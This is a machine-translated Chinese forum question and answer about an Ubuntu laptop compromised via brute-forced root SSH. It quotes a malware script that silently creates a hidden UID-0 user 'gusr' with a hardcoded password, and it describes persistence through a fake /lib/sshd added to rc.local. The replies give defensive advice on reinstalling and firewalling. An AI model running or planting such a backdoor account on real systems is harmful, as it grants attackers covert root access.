如何处理笔记本电脑上的恶意软件？

我相当确定我的Ubuntu 13.10笔记本电脑感染了某种恶意软件。

每隔一段时间，我会发现一个进程/ lib / sshd（由root拥有）正在运行并消耗大量cpu。不是运行/ usr / sbin / sshd的sshd服务器。

二进制文件具有--wxrw-rwt权限，并且在/ lib目录中生成并生成脚本。最近的一个名为13959730401387633604，它执行以下操作

#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd

gusr用户是由恶意软件独立创建的，然后chpasswd挂起，而占用了100％的cpu。

到目前为止，我已经确定gusr用户已另外添加到/ etc /中的文件中。

/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid

似乎该恶意软件使用“-”后缀复制了所有这些文件。由root修改的/ etc /文件的完整列表在此处。

此外，/ etc / hosts文件已更改为this。

/ lib / sshd首先将自身添加到/etc/init.d/rc.local文件的末尾！

我已经删除了用户，删除了文件，杀死了已处理的树，更改了密码并删除了ssh公钥。

我知道我基本上已经搞砸了，很可能会重新安装整个系统。但是，由于我登录了其他几台计算机，因此至少尝试将其删除并弄清楚如何获得它会很好。关于如何做到这一点的任何建议将不胜感激。

看来他们是在3月25日通过强行强制root登录进入的。我不知道默认情况下在Ubuntu中启用了root ssh。我禁用了它并设置了denyhosts。

登录名显然是香港某地的59.188.247.236。

我从EmperorLinux那里获得了笔记本电脑，并且它们启用了root访问权限。如果您有其中之一，并且正在运行sshd，请当心。

首先，立即使该机器脱离网络！

其次，为什么要启用根帐户？除非您有充分的理由，否则您实际上不应该启用根帐户。

第三，是的，确保您干净的唯一方法是进行全新安装。还建议您从头开始，不要回到备份，因为您不确定何时开始。

我还建议您在下一次安装中设置一个防火墙，并拒绝所有传入的连接：

sudo ufw default deny incoming

然后允许ssh与：

sudo ufw allow ssh

并且不要启用根帐户！当然，请确保root ssh登录已禁用。